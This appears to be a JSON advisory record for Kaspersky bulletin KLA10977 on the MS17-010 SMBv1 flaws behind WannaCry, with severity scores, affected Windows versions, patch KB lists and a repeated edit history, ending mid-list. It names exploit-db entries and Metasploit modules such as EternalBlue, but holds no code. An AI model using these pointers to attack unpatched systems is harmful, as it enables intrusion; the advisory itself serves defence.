\n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": "2021-04-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977/", "reporter": "Kaspersky Lab", "references": ["https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-8/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-7/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2008/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2003/", "https://threats.kaspersky.com/en/product/Windows-RT/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-XP/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-10/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://portal.msrc.microsoft.com/en-us/security-guidance", "http://support.microsoft.com/kb/4012217", "http://support.microsoft.com/kb/4012215", "http://support.microsoft.com/kb/4012216", "http://support.microsoft.com/kb/4012606", "http://support.microsoft.com/kb/4013198", "http://support.microsoft.com/kb/4013429", "http://support.microsoft.com/kb/4012212", "http://support.microsoft.com/kb/4012214", "http://support.microsoft.com/kb/4012213", "http://support.microsoft.com/kb/4012598", "https://threats.kaspersky.com/en/threat/Intrusion.Win.EternalRomance/", "https://threats.kaspersky.com/en/threat/Intrusion.Win.CVE-2017-0147.sa.leak/", "https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41891", "https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://threats.kaspersky.com/en/threat/Intrusion.Win.EternalRomance/", "https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/43970", "https://threats.kaspersky.com/en/threat/Intrusion.Win.CVE-2017-0147.sa.leak/", "https://www.exploit-db.com/exploits/41987", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-18T11:18:34", "history": [{"bulletin": {"id": "KLA10977", "hash": "85e14e3fbb5015475388d9280c28862a3e56beadd857352871dc4dd746f64323", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977\nMultiple vulnerabilities in Microsoft Server Message Block (SMB)\t\t\t ", "description": "### *CVSS*:\n8.5\n\n### *Detect date*:\n03/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Windows RT](<https://threats.kaspersky.com/en/product/Windows-RT-2/>)\n\n### *CVE-IDS*:\n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n\n\n### *MS list*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>)\n\n### *KB list*:\n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012598](<http://support.microsoft.com/kb/4012598>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>)", "published": "2017-03-13T00:00:00", "modified": "2017-05-22T00:00:00", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-10-18T12:46:00", "history": [], "viewCount": 67, "enchantments": {}, "objectVersion": "1.6"}, "lastseen": "2017-10-18T12:46:00", "differentElements": ["cvss", "description", "published", "title"], "edition": 1}, {"bulletin": {"id": "KLA10977", "hash": "85b4da5fc7b48e994fed8ca4e288208b71e5b1a1a4ac153424a8aa3c728386c8", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB)\t\t\t ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Windows RT](<https://threats.kaspersky.com/en/product/Windows-RT-2/>)\n\n### *CVE-IDS*:\n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n\n\n### *Microsoft official advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>)\n\n### *KB list*:\n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012598](<http://support.microsoft.com/kb/4012598>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>)", "published": "2017-03-14T00:00:00", "modified": "2017-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-02-19T21:28:25", "history": [], "viewCount": 93, "enchantments": {"score": {"modified": "2018-02-19T21:28:25", "value": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/"}}, "objectVersion": "1.6"}, "lastseen": "2018-02-19T21:28:25", "differentElements": ["description", "modified", "title"], "edition": 2}, {"bulletin": {"id": "KLA10977", "hash": "973d607f9b9da5ee68bff11c96c3a9167b88127fdc37956f7ba2486b2b128658", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)", "published": "2017-03-14T00:00:00", "modified": "2018-09-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-09-27T11:50:58", "history": [], "viewCount": 359, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2018-09-27T11:50:58", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "KLA10977", "hash": "09cf9d65e506641f7a5a91eadd8a921e897a3a2064f415543abcf12f1fb8ef49", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)", "published": "2017-03-14T00:00:00", "modified": "2018-10-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-10-18T16:04:13", "history": [], "viewCount": 361, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2018-10-18T16:04:13", "differentElements": ["cvss", "cvss2", "cvss3", "description", "modified"], "edition": 4}, {"bulletin": {"id": "KLA10977", "hash": "8ec2e84df031d11bdd60a2f1874599ad", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": "2020-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-12-03T07:12:31", "history": [], "viewCount": 518, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", 